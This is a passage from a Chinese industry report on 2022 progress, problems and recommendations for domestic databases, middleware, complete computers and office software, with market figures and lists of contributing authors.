支持的硬加密技术、压缩技术等可以和生态伙伴衍生出更多高价值的解决方 案。 本章主笔人员: 芯盛智能科技有限公司邓博、董昱、周礼 芯盛智能数据有限公司康毅、曹亮、左佰燕 5.数据库 2022年,数据库企业与自身产业链上下游厂商一起,在技术、产品、生态、 市场等方面持续投入并取得了可喜的成绩,但也普遍面临着供给侧赛道拥挤、 行业应用相对迟缓、适配和数据迁移工作量大等共性问题。未来三年,肩负 深化自主创新的使命,国产数据库企业面临着新的机遇和挑战。 5.1 国产关系型数据库和云数据库快速发展 5.1.1 集中式数据库突破核心技术,开始覆盖高端应用 在集中式关系型数据库领域,国产数据库的性能指标已基本达到国外同 类产品水平。共享存储集群技术代表了该领域的核心高端技术,长期以来仅 由Oracle 掌握。经过长期攻关,国内数据库厂商突破了共享存储集群、大规 模并行计算、行列融合存储等核心技术,实现了包括共享存储集群高端特性 在内的主要核心功能特性,在产品性能方面已经达到了大部分用户的实用要 求。 在技术不断突破、产品不断完善的同时,国产集中式关系型数据库逐步 走向行业应用。部分数据库产品已经应用在航天等国家重大工程项目中,稳 定性、安全性、可靠性都经受住了考验;此外,国产数据库产品在金融、电网、 民航、电信、烟草等行业得到了广泛应用,逐步替代了国外产品。伴随着产 品覆盖面的逐步扩大,国内数据库厂商建立了稳定有效的市场营销渠道和技 术服务网络,能为用户提供定制化产品和本地化原厂服务,充分满足用户需 求。 5.1.2 云数据库快速发展,国内市场占有率领先 2022年3月3 日 Gartner发布了《中国数据库市场指南 (Market Guide for DBMS,China) 》² , 报告中预测,未来四年中国数据库行业向公有云迁 移的速度将超过全球平均水平,甚至会超越美国。另据IDC 报告³显示(《2021 年下半年中国关系型数据库软件市场跟踪报告》,2022年7月4日发布), 2021 年下半年,国内以公有云部署的关系型数据库市场中,国产云数据库占 有率接近75%。 相对于传统数据库,云原生数据库通过存储计算分离,实现资源池化 和弹性,具备高扩展性、高可用性、低成本等优势。国内厂商提出了DDC (Disaggregated Data Centers) 架构,在 DDC 架构的实现层面引入Serverless 技术,实现数据库内计算、内存和存储三层资源解耦,能够为用户提供具备 秒级智能弹性扩容能力的云原生数据库,实现了Serverless能力,成本只有 传统商用数据库的1/10,同时支持海量数据秒级实时分析查询。 5.1.3 开源数据库生态建设稳步发展 开源在数据库系统的发展过程中发挥了重要作用,即使是商用闭源数据 库系统,在开发和运维工具方面也依赖庞大的开源生态。目前我国的数据库 开源社区主要包括: TiDB 社区、OceanBase 数据库社区、阿里云 PolarDB 社 区 、openGauss 开源社区、瀚高开源数据库 IvorySQL等,社区活跃度和影响 力居世界前列,贡献量仅次于美国。 5.2 三大因素成为制约国产数据库发展的主要原因 5.2.1 供给侧赛道拥挤,需求侧总体向好但不及预期 从供给侧看,受政策引导和技术推动,国产数据库市场呈现百花齐放的 良好态势,同时也暴露出赛道拥挤的问题。截止2022年,我国数据库厂商 2 https://bbs.csdn.net/topics/605209697 3 http://hk.stock.hexun.com/2022-07-06/206300999.html 超过200家。为了争取政策红利,在缺乏良性竞争机制的市场环境下,激烈 的价格战导致厂商生存压力大。价格战影响了整个国产数据库的市场体量, 造成“劣币驱逐良币”效应,同时数据库厂商把精力放在价格战上,就没法 投入更大的精力提升产品和服务质量,对数据库市场的发展非常不利。 从需求侧看,数据库市场总体向好,行业应用进入落地关键阶段。然而, 受疫情及相应的经济形势的影响,未来一段时期的国产化市场规模有可能比 业界预期的要小20%-30%。这对数据库产业发展有不利影响。 5.2.2 行业应用对数据库要求更高,替代工作推进迟缓 关键信息基础设施领域的数据库国产化替代工作,面临的困难比党政办 公系统要大的多。从技术难度上看,办公系统的数据库应用技术难点相对较 低,其次是企业管理系统,而行业应用的技术难度最大。对于行业级数据库 应用,难度主要在于两个方面: 一是对性能和稳定性的要求远远高于党政办 公和企业管理,二是不同行业有各种特殊需求,这增加了数据库的适应性难 度。以金融行业为例,要求系统无故障执行能力达到99.9999%又如风电行业, 作为一种不稳定能源,风电检测和管理对数据有很强的依赖性,自动化程度 也相对较高,风电数据来源广、种类多,在实际业务中,常常需要将多种数 据融合使用,要求数据库具备实时数据写入、动态加列、复杂业务处理扩展、 复杂运算扩展、跨库更新、并行处理、高可用等能力。 5.2.3 国产化适配和数据迁移工作量巨大 国产化适配是一个系统工程,目前国产化环境下各产品的互相认证和适 配,只是最基础的工作。在用户现场,仍然需要搭建适配测试环境进行综合 测试。由于国产化的芯片、操作系统、数据库、中间件、应用没有事先进行 过综合适配,导致多个厂商的系统之间不可避免地会出现不兼容的情况。解 决类似问题需要各产业节点的厂商联合诊断测试,共同解决问题。这不仅耗 费了大量的时间和精力,也带来了系统的不确定性,严重影响了用户的信心 和上线运行。 数据迁移则是国产数据库厂商绕不开的基础工作。为此,各数据库厂商 都成立了数据迁移的专业团队、开发数据迁移的专业工具。即便如此,仍不 能完全保证数据迁移工作不出问题。 一般数据迁移工作包括迁移评估、迁移 改造、数据迁移和服务交割四个阶段,每个阶段又包括四个子阶段。十六个 阶段中,每项工作都会投入大量人力和时间,这给国内数据库厂商增加了巨 大的工作量,而厂商投入的每一份工时都是资本和人力的损耗。 5.3 数据库厂商三措并举,支撑自主创新向行业应用深化 5.3.1 建立和完善标准体系 为解决数据库市场低价竞争等问题,规范数据库行业发展,需要建立一 系列数据库行业标准,正确引导用户和数据库厂商。工信部已经在组织相关 单位制定相关技术标准,要求用户按照统一的技术标准选择数据库产品。这 在一定程度上有助于规范数据库厂商的低价竞争,同时也为数据库产品划定 赛道,使不同类型的数据库产品专注于适合自身发挥的领域和应用场景。 在工信部和信标委的指导下,全国信息技术标准化技术委员会数据库标 准工作组组织下,由行业内多家厂商共同参与起草了《集中式数据库设计规 范》(计划号:2022-1108T-SJ) 。 该规范的设计思路主要从逻辑设计、物理 设计、开发设计、业务设计等几个方面展开,有助于指导和规范各数据库产 品的设计、建设与集成工作,从而降低兼容适配难度,改善基础软件的产业 生态环境。 评测基准是评价数据库系统的重要标准,是促进数据库系统研发的主要 驱动力之一。现有标准有GB/T30994-2014《 关系数据库管理系统检测规范》, 目前评测基准的标准需要进一步细化和完善,例如,TPC 系列评测基准的出 现和发展使诸多关系数据库厂商能在一个公平、公开的环境中良性竞争。 5.3.2 持续提升技术能力 为深化行业应用,国产数据库针对行业的特殊性和复杂性,已在开展一 系列技术能力的提升。例如,针对金融等行业高可靠的需求,国产数据库正 在优化共享存储集群方案,提高技术成熟度和易用性;针对部分行业全国产 高性能的要求,国内数据库厂商已着手研制数据库一体机,通过工程化的手 段,集成数据库运行所需要的全部 IT 基础设备,向用户交付开箱即用的整 体解决方案;针对地理空间行业应用,国产数据库对接GIS 开发平台,支持 空间数据类型,提供按需动态扩展的高性能计算环境、海量数据存储环境, 满足海量空间基础数据存储、高并发用户业务办理和信息共享查询;针对新 能源行业应用,国产数据库通过对数据库的实时数据写入、动态加列、复杂 业务处理扩展、复杂运算扩展、跨库更新、并行处理、高可用等适应性改造, 满足新能源行业用户的个性化需求。 5.3.3 加强产业上下游协作 为解决国产化适配和数据迁移工作量大等问题,国产数据库厂商需要和 上下游企业加强协作,开展综合适配验证、测试与优化和数据迁移三个方面 的工作。 综合适配验证指数据库厂商与应用、中间件、操作系统、芯片、整机等 厂商协作,在测试环境中提前发现问题,协同诊断问题和解决问题,并完成 适配测试验证。测试与优化指开展数据库评测基准建设,使数据库厂商能在 统一的评测基准上进行测试,在测试环境中进行严格的功能、性能、及优化 测试,充分评估真实负载情况下的最优配置,为用户提供基于测试结果的最 优方案。数据迁移要推行一站式数据库迁移方案,提供从策略拟定、工程评估、 数据库迁移、应用适配、性能验证及优化到上线及运维,全生命周期的体系 支撑,围绕数据迁移提供完整的工具链,达到缩短工程周期、降低迁移的技 术难度、提升迁移效率,同时提高迁移后的数据库性能及稳定性的目的。 本章主笔人员: 天津神舟通用数据技术有限公司项钦之 阿里云计算有限公司于巍、王远 本章贡献人员(按公司名称拼音排序): 北京柏睿数据技术股份有限公司赵菁华、高阳、朴晟宏 北京人大金仓信息技术股份有限公司张昊 北京万里开源软件有限公司彭蔚刚、李杨桅、徐爽 北京优炫软件股份有限公司王军、梁星 瀚高基础软件股份有限公司吕新杰、马继超、谷永舫 平凯星辰(北京)科技有限公司张翔、兰元、高荣娟 武汉达梦数据库股份有限公司冯源、张寒 6. 中间件 6.1 国产中间件在较大范围获得应用,但仍面临挑战 6.1.1 国产中间件的行业应用成效较好,但覆盖面窄、分布不均 中间件产品根据应用领域划分,可大致分为三类:基础类、数据类和云 计算类,每一类中间件都包括多款中间件产品,每款产品适用于不同的业务 场景。目前,在自主创新体系下大规模应用的只有基础类中间件中的一款产 品—应用服务器中间件,这得益于它是标准化程度最高、使用范围最广的中 间件软件。 党政办公系统中间件应用率先启动并持续深化。2022年6月30日,国家、 省、地市三级的党政电子公文系统信息技术应用创新项目完成了验收。目前, 国产中间件在党政行业的应用逐步向电子政务推进,很多部委级客户树立了 一系列标杆项目,有些部委甚至已经基本完成本级业务系统中间件产品的全 替代。实践证明,国产中间件在党政领域有能力替代同类国外产品和开源软 件。 金融行业,国产中间件已应用到核心业务。2022年,金融信息技术应 用创新由政策驱动转向业务需求驱动,金融机构开始大量采购国产中间件。 许多金融机构陆续启动一般业务系统、核心业务系统的改造,大部分系统已 从双轨转向单轨运行。部分金融机构与头部中间件厂商深度合作,已形成核 心系统全栈自主创新标杆案例。 电信行业,国产中间件已开始在中国移动总部及21 个省的核心业务系 统中替代IBM 或 Oracle产品,但尚未实现大规模应用。另外,制造业、能源、 交通、教育、医疗等行业,国产中间件虽有一定规模的应用,但基于全栈自 主创新环境的案例相对较少,尚未形成整体突破。此外还有部分行业,专业 软件(如制造业大规模使用的生产和设计类软件)是主流。这些专业软件大 部分都是国外产品,国产中间件短期内还无法覆盖到这些业务领域。 总体来看,金融、电信、电力、交通等8大重点行业正在加速自主创新 基础软硬件的落地。从目前中件间替代的进展来看,行业之间发展表现出较 大的不平衡趋势,有些行业已经从政策驱动走向需求驱动,形成“应用-反馈- 升级迭代-再应用”的正向循环,而有些行业仍停留在政策驱动层面,自身 的业务需求没有释放出来。 6.1.2国产中间件的总体市场份额偏低 计世资讯CCW Research 2022.03 数据*显示,2021年国内中间件市场总 体规模为88.7亿元,同比增长11.7%。其中,IBM、Oracle 的市场份额占到 了47.8%,约占总体规模的一半。IBM 、Oracle 较早进入中间件领域,具有 很强的先发优势、整体解决方案优势和技术优势。用户的计算资源、数据资源、 业务应用系统及标准规范都依托于底层软件基础架构,使用周期越长,对产 品及服务的粘性就越强。尤其这两家公司的产品主要应用在核心业务系统, 这些系统的软件基础设施的投资规模很大,中间件替代成本较高。 国产成熟中间件产品的市场份额总共占据19.6%,约占总体规模的五分 之一。虽然行业用户在数字化转型过程中更倾向于选择国内自主创新的中间 件产品,但国内厂商之间存在比较严重的同质化竞争现象,价格战非常惨烈, 另外,由于中间件的技术门槛高、发展周期长、研发投入大,中间件产业远 远没有形成健康良性的协同发展模式。 非成熟商用中间件产品市场份额约占30%。中间件领域的其他参与者主 要包括云平台厂商、系统集成商、应用软件开发商等。在具体项目中,这些 市场主体出于降低建设成本的角度考虑,倾向于基于开源组件组装或自研中 4 https://mp.weixin.qq.com/s/dltdYIu9Y1ac3EwN1dV3Gg 间件。这些中间件仅用在特定项目中,很少作为独立产品在市场上公开销售。 我国应用较多的开源中间件主要来源于Apache 基金会、Linux 基金会、云 原生计算(CNCF) 基金会等国外开源基金会和相关社区。由于国内企业对这 些开源社区的参与度和贡献度不高导致话语权不高, 一定程度上存在安全风 险。 6 .2三因素影响国产中间件的市场表现 6.2.1 成熟商用中间件供给能力不足 在全栈自主创新环境下,系统级性能与行业核心业务需求还有差距。国 产中间件的应用范围正在由党政领域向以金融、电信为代表的重点行业领域 快速扩展。这些系统在性能、稳定性、可靠性等方面的要求相对于办公系统 更高,对中间件的要求也更高。虽然国产中间件在功能、性能、用户体验等 方面与国际主流产品的差距越来越小,但与国产芯片、整机、操作系统、数 据库和应用软件等搭配运行,还存有较大的整体提升空间。 新型技术架构下国产中间件产品尚有空白。随着云计算技术的成熟和普 及,资源极致弹性、应用敏捷开发迭代正在发展成为云服务的新常态。为适 应分布式技术架构和云原生应用特点,传统的中间件产品正在通过架构升级 等方式向着云化方向发展。另一方面,也涌现出了一批新的针对云计算场景 的中间件组件。目前适用于云原生架构的中间件以开源组件为主,国内中间 件厂商需要在微服务、容器、DevOps 等技术领域进一步发力,弥补相应中 间件产品的空缺。 6.2.2 用户对中间件软件的认识不到位 在信息技术体系中,中间件属于基础设施层软件,主要运行在服务器端, 其使用者主要是负责应用系统管理与运行维护的技术人员,应用系统的最终 用户基本没有机会直接感知到它的存在。在应用系统建设过程中,最终用户 重点关注的是系统的整体架构、具体功能、资金预算等。由于中间件技术门 槛较高,大部分单位技术力量不足,对中间件软件的验证和把控通常交给应 用系统承建商完成,中间件厂商直接面向最终用户交流接触的机会并不多。 尤其一些特殊行业,对参建单位有一定的资质要求,中间件厂商更是很难见 到最终用户。另外,越来越多的客户选择云平台作为信息化基础设施,而云 平台的工程建设模式,决定了一般由云厂商提供一体化解决方案并打包提供 一揽子软件服务,并不明确呈现中间件。 因此,中间件对应用系统最终用户是透明的,很多用户将中间件和应用 服务器画上等号,部分用户认为中间件属于非必要替换软件,很多单位在项 目规划期对于中间件数量及部署方式不清晰,导致没有对中间件做出充足的 预算。并且,大部分中小型企业出于成本考虑使用开源中间件较多,但这些 单位的技术力量有限,对开源软件做不到可管可控。 6.2.3 用户对应用国产中间件缺乏主动性 由于重视程度不够,部分行业主管部门对国产中间件的推广应用没有形 成顶层规划,下属单位在落地实践过程中呈无章可循的状态。任何一个应用 系统的创新改造都要覆盖整条产业链,涉及到多种基础软硬件产品的选型、 适配,围绕实际业务场景的验证和测试,需要组织协调多家产品厂商、应用 开发商联调联测。中间件属于基础软件,处于应用系统和基础平台之间,其 替代工作更是繁杂。由于中间件没有被赋予和操作系统、数据库一样的重视 程度,大部分行业在参照党政办公系统的过程中认为,中间件属于非必要替 换软件。另外,受疫情、地方经济发展和财政资金等多重影响,大部分单位 信息化建设资金紧张,有限的预算优先用于直接产生效益的核心业务系统。 6.3 共建产业生态,促进国产中间件的应用推广 在自主创新体系下实现国产中间件的大规模推广应用是一项复杂度较高 的系统工程,需要监管侧、供给侧和需求侧共建国产中间件生态体系。建议 有关部门组织中间件安全可控评估体系建设, 一方面进行统一规范化管理, 避免重复建设,降低适配成本;另一方面对于重点行业大规模使用国外中间 件产品的核心业务系统从政策上给予引导,逐步实现全栈自主创新。供给侧, 联合高校和科研机构,不断提升产品供给能力;需求侧,要优先选用国产中 间件筑牢数字化转型技术底座。 6.3.1 中间件厂商加快高性能高可靠产品的研发 首先,为突破中间件关键技术瓶颈,国产中间件厂商要与高校、科研机 构联合攻关,实现底层技术可控。在产品方面,要从产品性能、可靠性、易 用性、安全性、标准符合性、运维能力等方面全方位升级,优化中间件与国 产芯片的适配,弥补中间件在微服务、容器化等新技术方面的不足。 其次,中间件厂商需要持续加大研发投入,同时加强与国产芯片、操作 系统、数据库、整机和应用软件的适配,围绕典型业务场景多方协作联合调优。 大多数重点行业的核心系统已经建设运行多年,为实现业务应用的场景适配, 国产中间件需要具备更大的灵活性以支持各种架构体系,支撑分布式架构改 造。为保障业务应用的迁移落地,中间件要护航应用的全生命周期,同时具 备对标国际主流产品,支撑高性能、实时和高并发业务需求的能力。 第三,为满足新型信息基础设施建设的技术需求,国产中间件厂商要积 极参与云原生等新技术发展方向的探索和实践,逐步实现从追赶跟随到超越 引领的发展;加快现有中间件产品自身的云原生化转变,针对应用架构升级、 分布式、微服务化、智能运维等需求不断推出新产品;打破传统以单一产品 服务用户的思路,响应中台化需求,通过方案、产品、运营运维相结合的多 种方式更好地为重点行业用户提供多场景的方案。 6.3.2供需双方以联合实验室为载体开展深度合作 应用是国产中间件发展的最主要动力。如果产品没有人用,厂商很难发 现问题,也很难了解客户真正的需求,产品也就无法有效进行迭代升级。从 这个角度出发,作为供给侧的中间件厂商要对业务场景、信息系统等进行深 入理解,作为需求侧的用户要尽可能为国产中间件产品和解决方案提供机会, 通过以应用促发展的方式不断提升国产中间件市场占有率。 建议在行业主管单位领导下,建立供需双方的良性合作模式。例如,基 于典型业务场景,开展包括中间件在内的各类软硬件产品的适配验证和运行 测试,降低试错成本,解决行业共性问题,形成解决方案和实施路径,为产 业发展提供机制和平台。中间件厂商积极提供涵盖选型适配、方案设计、研 发实施、迁移测试到全面落地的全系列服务,与需求方紧密合作,形成能够 在行业内推广的解决方案。同时,厂商要借助供需双方良好的合作模式,寻 求面向用户单位提供精细化的中间件技术的宣传和培训,改变行业用户对中 间件认知不到位的现状。 本章主笔人员: 北京东方通科技股份有限公司俞立平、于滨峰、李蕾 7.整机 整机企业作为生态链的中间环节,向上对接基础软硬件供应商,反馈芯 片、系统、应用等各环节的改进意见,向下对接客户需求,起到承上启下的 重要聚合作用。上游的芯片、内存、硬盘等厂商不面向销售渠道和最终客户, 下游的销售渠道和客户也不具备构建系统性生态的能力,需要通过整机企业 打通产业链,营造生态合力。2022年,网信产业进入一个相对低平的阶段, 整机企业在产品迭代、生态发展、市场开发、客户交付与服务等领域持续投 入和提升,但整体营收不及预期,企业经营也面临一些困难。随着2022年 底新的市场机遇到来,整机企业也为即将到来的新机遇做好了准备。 7.1 市场走势低平,整机企业选择坚守 7.1.1 市场表现喜忧参半 现阶段,国产整机产品的主力市场主要集中在部分行业(党政、金融、 电信、电力等),存在客户群体及应用场景相对还不够丰富的问题,同时存 在产品的应用比例不高,或采购之后使用率较低的现象。 喜的方面,市场格局正在从“政策”单驱动向“政策&市场”双驱动 模式发展。整机市场经过2020年党政、2021年金融、电信为试点的落地实践, 2022年开启了金融、电信、电力等重点行业的全面推广阶段,并逐渐向全行 业扩展。党政领域的市场布局从部委、省市级下沉到区县乡级,从电子公文 扩展到电子政务。随着试点项目的成功推广,金融行业的国产整机的采购占 比不断提高,应用范围不断扩大,由单点应用向行业大规模应用发展。电信 行业的三大运营商集采项目中都有一定数量和比例的国产整机需求。电力行 业目前主要以试点为主,试点项目涵盖业务管理和日常办公等需求,国网和 南网目前都有试点项目落地。 忧的方面,大部分整机企业在国产化领域的销售收入及利润均出现不同 程度的下降。从出货量看,2022年整机产品销量不及预期。从利润空间看, 由于需要投入大量人力开展各种软硬件的适配工作,导致整机企业成本不断 上升;同时随着产品售价持续降低,利润空间不断缩减。 7.1.2生态建设稳定开展 整机企业在本年度的困难形势下,依然保持了重点机构、重点岗位及核 心人员的相对稳定。在企业架构和人员稳定的前提下,遵循产品线规划,继 续保持与芯片、操作系统、部件厂商等高频次的沟通,完成了新部件的引入、 适配、升级迭代工作以及操作系统的迭代升级工作。尽管当前基于不同CPU 平台、不同操作系统的搭配,适配认证工作量极大,但各整机厂商对生态工 作仍然十分重视。出于只有生态能够支撑起业务及应用的出发点,整机企业 在2022年不断加大与各类软件、外设等产品的适配认证工作,持续丰富产 品生态。 7.2 四方面因素影响整机市场 7.2.1 政策依赖度过高,造成短期经营数据下滑 2022 年,国产整机市场出现了下滑,主要有内外两方面的原因。外因 是行业过度依赖政策因素,在没有政策支撑的情况下,用户主动采购国产化 整机产品的意愿不足。另外,在疫情和经济下行的双重压力下,各类型用户 都由于经费原因,暂缓了国产化替代工作。内因是由于近年国产化市场爆发 式增长,新生了一批整机企业,在市场规模阶段性缩小的背景下,企业不得 不采用低价策略抢占市场份额,导致行业整体利润率降低,进而导致经营数 据下滑。 7.2.2 多技术路线给厂商和用户带来困扰 整机产品面临着多个处理器技术路线、多个操作系统形成的排列组合的 复杂局面。对于整机企业来讲,每引进一款部件,都需要针对CPU 技术路 线数量乘以操作系统数量的适配验证组合,工作量大、周期长。而对于用户侧, 将会面对已采购的产品技术路线未来的发展潜力、生态丰富程度以及与后续 其他技术路线产品的兼容等难题。如出现与后续其他技术路线、其他操作系 统的兼容问题,可能会造成资源浪费和业务系统的割裂局面。 7.2.3 供给能力制约整机产品在行业市场的表现 在市场短期收缩的背景下,整机厂商跟进党政零散化市场和行业用户过 程中,可提供的产品类型不多,没有满足行业需求的解决方案,这也是制约 国产整机产品市场表现的原因之一。 7.2.4使用习惯是应用比例不高的主要原因 用户使用习惯是影响国产整机“采而不用”的重要原因。终端用户在长 期使用的操作系统及各类应用软件,很多并没有在国产整机产品上提供,或 者就不会有机会提供,只能寻找替代软件或利用多个软件组合的形式来满足 实际需求。虽然各操作系统、应用软件厂商已经在用户使用习惯上做出了大 量的努力,但是依然会有一个改变的过程。 7.3 整机企业立足自身谋求创新发展新路径 面对上述问题,作为市场主体的国产整机厂商只有立足于提升能力、改 进产品、扩大适用面才能逐渐摆脱严重依赖政策的被动发展模式,在不断深 化的自主创新大趋势下走出核心技术之外的产业自主道路。 7.3.1 借助新的政策机遇,争取加大行业纵深 从我国网信市场的发展逻辑来看,预计将分三步走:第一步,在党政等 封闭市场进行应用,打磨产品和生态,培育骨干企业;第二步,在产品好用 和生态相对成熟之后,进入重点行业市场,如电信、轨交、电力等行业,市 场较前期能放大4至5倍;第三步,将网信产品全面应用到消费市场,而这 将是一个超过万亿的市场。 目前,随着网信产业的快速发展,自主创新的整机产品已经能够满足一 些特定的应用场景,比如电子公文、电子政务等部分应用系统。这些系统使 用的硬件设备、系统软件、应用软件以及安全软件、外设等,均已得到用户 的验证和认可。这些已经验证运行正常的场景的解决方案,为扩展到各行各 业奠定了基础。近期,相关政策对重点行业的自主创新提出了新的量化要求。 未来三年,党政领域和重点行业的自主创新建设将全面加速,这为整机厂商 提供了良好的发展机遇期,也为产业界加大行业纵深带来了机会。 7.3.2 围绕急需解决的问题,打造一批行业级解决方案 用户采购的不是单纯的终端或服务器,而是依托于这些产品的、针对特 定应用场景的解决方案。每一个解决方案,都是集成了一系列基础软硬件产 品的综合应用系统,整机产品在解决方案中起到的是底座的作用。在加大行 业纵深路径中,整机厂商要谋求从特定行业、特定应用场景入手,联合用户、 主管机构、上下游厂商一起建立解决方案中心。在这些机构支撑下,进行集 成性质的兼容性适配验证,以实际的应用场景全流程工作为主线,完成方案 的搭建、运行、测试,打造一批能够满足特定应用场景需求的解决方案。随 着解决方案的持续积累、客户侧的持续使用验证、相关产品的迭代、升级, 将有更大的机会满足更多应用场景的实际需求。 7.3.3 加强服务保障体系,提升产品使用体验 用户在使用产品过程中遇到的问题,具有一定的特殊性,尤其是涉及到 操作系统设置、应用软件安装、网络配置、外设等层面的需求,与普通产品 有区别,对于部分使用人员、运维人员提出了更高的技术要求。针对此类情况, 整机企业要加大服务保障体系建设,在广度和深度上实现及时、高质量的服 务保障,解决客户侧的服务需求问题,提升网信整机产品的使用体验。 本章主笔人员: 同方计算机有限公司张伟、邓忠良、李亚军 本章贡献人员(按公司名称拼音排序): 百信信息技术有限公司侯飞 超越科技股份有限公司冯磊、朱忠客、刘维霞 中国航天科工集团第二研究院七○六所王晓光、张鹏、李强 8.办公软件 办公软件处于软件产业的最末端、用户体验的最前端,其功能具备相对 的独立性,对其他软硬件的依赖性较小。随着产品技术的不断提升,与相关 政策的大力推动,流式软件成为办公软件中应用比例最高的一类,版式软件 的应用范围明显扩大,工业设计软件和图像处理软件进入加速启动阶段。 8.1 办公软件使用情况参差不齐 8.1.1 流式软件 从覆盖面上看,国产文档处理软件在国务院、省级和地级市已基本实现 全覆盖,在金融行业的覆盖率相对较高,位列八大重点行业之首,仅次于党 政领域,在电信、交通、电力、石油、航空航天、教育、医疗等其他行业的 覆盖率还处于较低水平。从使用率上看,国产文档处理软件存在“替而不用” 的现象。以流式软件为例,尽管成熟度高、稳定性好、独立性强,功能和性 能上已完全能够支撑用户的日常办公需求,在很多领域获得了良好的替代进 展和积极的使用反馈,但由于使用习惯、双系统并行等原因,“替而不用” 的现象仍然存在。 8.1.2版式软件 OFD 是具备我国自主知识产权的版式文档格式,其具有格式独立和原 版原式的特点,拥有安全性高、体积小、可扩展性强等技术优势,最早从电 子公文领域开始应用,随后应用范围逐渐扩大。目前OFD 软件的使用范围 覆盖了电子发票、电子合同、电子证照、电子档案、电子病历、电子票据、 电子回单、电子保单等诸多领域。即便如此,相比于PDF,OFD 在很多行 业领域还没有得到足够的重视和认可,在应用深度和广度方面还存在较大差 距。 8.1.3 工业软件 由于技术壁垒和先发优势等原因,我国工业软件主要市场份额被国外企 业占据。根据中国工业技术软件化产业联盟统计⁵ ,2018年,西门子、达索、 欧特克、PTC 和 Bentley 五家海外大厂在中国市场占比94%,而国内厂商占 比不足5%。2020年我国工业增加值总量占全球比重接近30%°,同年我国工 业软件市场规模同期仅占全球6%’。相较于我国工业制造业的迅速发展,支 撑工业、企业、业务的国产工业软件却显得十分薄弱。 8.1.4 图像处理软件 目前,国产专业图像处理软件技术已逐渐成熟,实现 PhotoShop 90% 以 上的功能,可处理20亿级像素的图片,在支持嵌入矢量图形的基础上双向 兼容PS 格式 (PSD), 能为用户提供更好的工业制图、平面设计、AI 绘图 体验。但是,由于起步较晚,国产图像处理软件仅在非专业用户中有一定的 覆盖面,在专业领域的国产化替代基本上还是空白。 8.2 产品、生态、标准和政策等因素影响未来发展空间 8.2.1 产品力存在差距 除流式软件与国外水平相当外,其他类型的办公软件在产品性能(特别 是高端功能)、核心技术、成熟度等方面与国外产品存在不同程度的差距, 如版式软件方面,国内产品在地理信息、工业制造等领域的高级功能上还存 在较大差距;工业设计软件方面,三维CAD 软件最核心的几何引擎技术尚 5 《中国工业软件产业白皮书(2019)》,工业和信息化部电子第五研究所、中国工业 技术软件化产业联盟,2019年11月 6 《制造业增加值连续十一年世界第一(新数据新看点)》,人民网,2021年9月 7 《中国工业软件产业白皮书(2020)》,中国工业技术软件化产业联盟,2021年5月 未取得重大进展;图像处理软件方面,相关产品在成熟度、细节处理、性能 和兼容性上还存在上升空间。 8.2.2云平台支撑能力不足 互联网时代,在线办公、云办公、移动办公成为办公人群的新需求。同 时,云计算技术在办公软件上的应用使得文件、数据的储存更安全,团队协 作更为便捷。在此背景下,多端协同和端云一体化成为办公软件发展的新趋 势。随着国产化云基础设施日渐完善,流式软件的在线及多终端产品在自主 云环境下得到大量实际应用;版式软件、工业设计软件也逐渐从客户端单机 版软件向端云协同的在线办公产品形态发展;图像设计软件、在线设计应用 也得到了快速发展。在应用形态呈现从单机到在线、从端到云、从桌面到移 动的变化的同时,基于国产化云平台的各种云化协同的文档处理软件大量尝 试部署,但是云平台对文档处理软件高级、复杂功能的支撑能力还存在较多 的问题需要解决,叠加云本身存在的问题以及云和办公软件之间的协调适配 问题等,使得办公软件在自主环境下的云化支撑还有待加强。 8.2.3 标准体系尚不完善 国产化文档处理软件的国家标准已有多项出台,但由于应用范围较窄、 深度不足、时间较短等原因,标准本身还有待完善。目前较为突出的问题主 要有:在线流式软件现有二次开发标准和格式标准尚未形成有效迭代,服务 端和在线办公软件的服务接口尚无国家标准,文档导出格式国家标准尚未出 台,用户使用习惯的无感过渡也需要评估指标。 8.2.4政策引导重采购轻使用 办公软件的推广应用在很大程度上依赖于政策推动。这导致在政策推动 力强的党政领域成效显著,在市场主导性强的行业领域进展较慢。同时,当 前政策侧重于对新增采购量的要求,对实际使用情况没有提出明确要求和考 核评价,这也是导致“替而不用”现象的原因之一。 8.2.5 用户使用惯性较强 长期以来,国内办公软件市场 一直为微软、Adobe、Google 等国际 IT 软件巨头所占据,从用户习惯到功能接口均形成了国际惯例和标准规范,用 户对国外品牌体系形成了很强的认知和使用惯性。虽然国内的流式软件和版 式软件在功能界面和使用性能方面都越来越接近甚至超越了国外软件,但用 户由于长期形成的品牌认知和使用惯性缺乏自主转变的动力,在短时间内难 以转变。 8.3 着重练好内功,推动高质量扩展 8.3.1 加大技术创新 产业的长远发展终究要靠市场的自发选择。因此打造更符合用户使用需 求和习惯的产品是长期赢得市场的核心要义。流式软件将在满足主流办公功 能的基础上,强化稳定性和性能,储备新产品及功能,加速产品与应用场景 融合,继续强化AI 能力,增强校对、辅助写作能力,训练推理平台共创; 版式软件将提升地理信息、工业制造等领域的高级功能;工业设计软件提供 将 DWG\DXF 等图纸文件输出为国产版式OFD 格式文件的能力,同时通过 智能语音标注方便设计师对图纸及图纸里的实体进行快速注释,为设计师之 间的交流提供一种新的交互方式;图像处理软件对标PhotoShop 专业软件, 将在图像底层的算法上加大投入,加强人工智能在图片处理的能力,在功能 覆盖度上更上层楼,在性能上力求达到并超过国外同类产品。与此同时,办 公软件厂商还将兼顾产品的安全性。如加强对开源工具、第三方软件的安全 评估工作,及时发现漏洞、恶意代码等安全威胁;加强在线办公软件防病毒、 防攻击能力,做好权限分级管理;做好隐私保护和数据安全防护等。诸如此 类的科技创新将成为越来越多用户选择国产办公软件的内因,也是办公软件 厂商赢得长期市场的根本途径。 8.3.2借助政策红利 如前文所述,党政领域存在较强的政策导向性,因此办公软件厂商将积 极跟进政策落实,按计划推进区县下沉和央国企改造,总结提炼工作经验与 典型案例并广泛推广复制。对于非党政领域,财政贴息等政策利好,对于办 公软件厂商拓展教育、医疗等领域具有积极意义。不过,行业市场不同于党 政市场,办公软件的推广需要由政策驱动转为需求驱动。办公软件厂商要总 结前期金融行业推广的经验,更加注重产品的性能、稳定性和适配性,秉承 由易到难的发展路线,先单点试点尝试而后扩大试点应用规模,在进一步提 高金融行业国产办公软件覆盖面的同时进军其他重点行业领域。 《“十四五”数字经济发展规划》指出,实施中小企业数字化赋能专项 行动,加快推进中小企业办公软件应用迫在眉睫。当前,协同办公软件特别 是远程办公软件产品在中小型企业的覆盖面仍然偏小。随着国家数字化转型 及软件正版化工作的有序推进,高性价比、轻量化的办公软件有望助推中小 企业数字化转型。因此,中小企业(特别是民营企业)常态化采购会逐渐成 为国产办公软件产业发展的一个重要驱动力。 8.3.3 完善标准体系 